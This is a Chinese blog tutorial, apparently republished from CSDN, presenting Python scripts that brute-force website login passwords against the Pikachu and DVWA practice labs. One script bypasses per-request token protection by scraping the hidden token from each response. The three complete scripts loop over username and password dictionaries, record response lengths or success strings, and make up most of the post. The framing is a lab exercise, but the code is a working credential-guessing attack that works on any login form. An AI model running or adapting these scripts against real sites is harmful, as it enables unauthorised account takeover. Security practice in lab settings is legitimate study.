Python实现破解网站登录密码(带token验证)

作者:CVE-柠檬i 时间:2021-09-29 06:22:22 

前言

上一篇暴力破解文章:一个简单的Python暴力破解网站登录密码脚本

测试靶机为Pikachu漏洞练习平台暴力破解模块下的 “token防爆破?”

春节期间歇了一阵子,吃睡玩看小说。写这个脚本的起因是因为burp设置带token的暴力破解我只会用pitchfork草叉模式,要是用cluster bomb集束 * 模式笛卡儿积那样就不会了,所以就干脆把之前写的脚本加了点东西实现这个功能了,到时候有空再学学多线程,爆破速度就更快了。

Python实现破解网站登录密码(带token验证)

关键代码解释

设置请求头

5~11行:指定url地址和请求头,user_token设置首次发送请求包时的token值。

url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"
user_token = '8680761fe979039a6f836599906'
header = {
   'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
   'Cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715'
}

get_token函数获取token值

13~16行:这个函数返回从响应包中获取的token

在http响应包中有一个隐藏的标签里面有token值:

<input type="hidden" name="token" value="5874161fe8db950ca7993759020" />

第15行:soup.select查找标签名为input,name为token的元素的value的值。

def get_token(r):
   soup = BeautifulSoup(r.text, 'html.parser')
   user_token = soup.select('input[name="token"]')[0]['value']
   return user_token

完整代码

from bs4 import BeautifulSoup
import requests
from requests.models import Response

url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"
user_token = '8680761fe979039a6f836599906'
#proxies = {"http": "http://127.0.0.1:8080"}  # 代理设置,方便burp抓包查看和调试
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
    'Cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715'
}

def get_token(r):
    soup = BeautifulSoup(r.text, 'html.parser')
    user_token = soup.select('input[name="token"]')[0]['value']
    return user_token

if __name__ == "__main__":
    f = open('result.csv', 'w')     #把爆破结果储存到文件里,这里为csv格式
    f.write('用户名' + ',' + '密码' + ',' + '包长度' + '\n')    #给文件设置标题

    #遍历字典文件,Cluster bomb 暴力破解
    for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
        for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
            username = admin.strip()
            password = line.strip()
            payload = {     #payload为POST的数据
                'username': username,
                'password': password,
                'token': user_token,
                'submit': 'Login'
            }

            Response = requests.post(url, data=payload, headers=header)
            result = username + ',' + password + ',' + str(len(Response.text))  #用户名密码以及响应包长度

            print(result)           #输出到终端
            f.write(result + '\n')  #输出到文件
            user_token = get_token(Response)    #调用get_token函数获取下一次循环需要的token
    print('\n---完成---\n')
    f.close()

运行结果

Python实现破解网站登录密码(带token验证)

查看保存的文件,查看包长度与其他不一样的数据

这里csv不会显示前缀会自动去掉首位0,可以把文件改成txt格式就正常显示了

Python实现破解网站登录密码(带token验证)

尝试登陆一下,登录成功。

Python实现破解网站登录密码(带token验证)

补充

下面小编为大家补充了另外两个利用Python实现破解网站登录密码的示例代码,希望对大家有所帮助

方法一:

import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"}  #代理设置,方便burp抓包查看
header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}

f = open('result.csv','w')
f.write('状态码' + ',' + '用户名' + ',' + '密码' + ',' + '包长度' + '\n')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
   for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
       username = admin.strip()
       password = line.strip()
       payload = {'username':username,'password':password,"Login":'Login'}
       Response = requests.get(url,params=payload,headers=header)
       result = str(Response.status_code) + ',' + username + ','\
           + password + ',' + str(len(Response.content))
       f.write(result + '\n')

print('\n完成')

方法二:

import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"}  #代理设置,方便burp抓包查看
header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}

f = open('result.txt','w')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
   for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
       username = admin.strip()
       password = line.strip()
       payload = {'username':username,'password':password,"Login":'Login'}
       Response = requests.get(url,params=payload,headers=header)
       if not(Response.text.find('Welcome to the password protected area')==-1):
           result = username + ':' + password
           print(result)
           f.write(result + '\n')

print('\n完成')

来源:https://blog.csdn.net/weixin_49125123/article/details/122794669

标签:Python,破解,网站,密码
0
投稿

猜你喜欢

  • Python设置默认编码为utf8的方法

    2023-09-23 16:08:34
  • 某一公司的ASP面试题

    2011-09-15 20:50:20
  • 使用Alt提升可访问性

    2009-04-04 19:22:00
  • Go语言的数据结构转JSON

    2024-04-25 15:04:23
  • 解决vscode中golang插件依赖安装失败问题

    2024-04-26 17:23:15
  • javascript将url中的参数加密解密代码

    2024-04-23 09:33:09
  • Python的代理类实现,控制访问和修改属性的权限你都了解吗

    2022-10-25 13:09:47
  • JQuery 绑定select标签的onchange事件,弹出选择的值,并实现跳转、传参

    2024-04-19 10:25:21
  • Vue Router根据后台数据加载不同的组件实现

    2023-07-02 16:59:14
  • Flask中jinja2的继承实现方法及实例

    2022-09-24 12:31:09
  • 使用matplotlib画散点图的方法

    2022-07-30 20:49:54
  • PyTorch安装与基本使用详解

    2023-05-09 03:20:51
  • MySQL分库分表的几种方式

    2024-01-22 05:25:36
  • python多线程编程方式分析示例详解

    2023-05-13 04:56:01
  • MYSQL 表的全面总结

    2024-01-13 12:01:25
  • 如何理解python面向对象编程

    2023-01-01 20:19:56
  • python返回数组的索引实例

    2023-11-01 04:48:17
  • 详解Go中处理时间数据的方法

    2024-02-22 15:14:00
  • Go方法接收者值接收者与指针接收者详解

    2024-02-17 04:30:45
  • Python基于jieba分词实现snownlp情感分析

    2023-11-14 21:43:38
  • asp之家 网络编程 m.aspxhome.com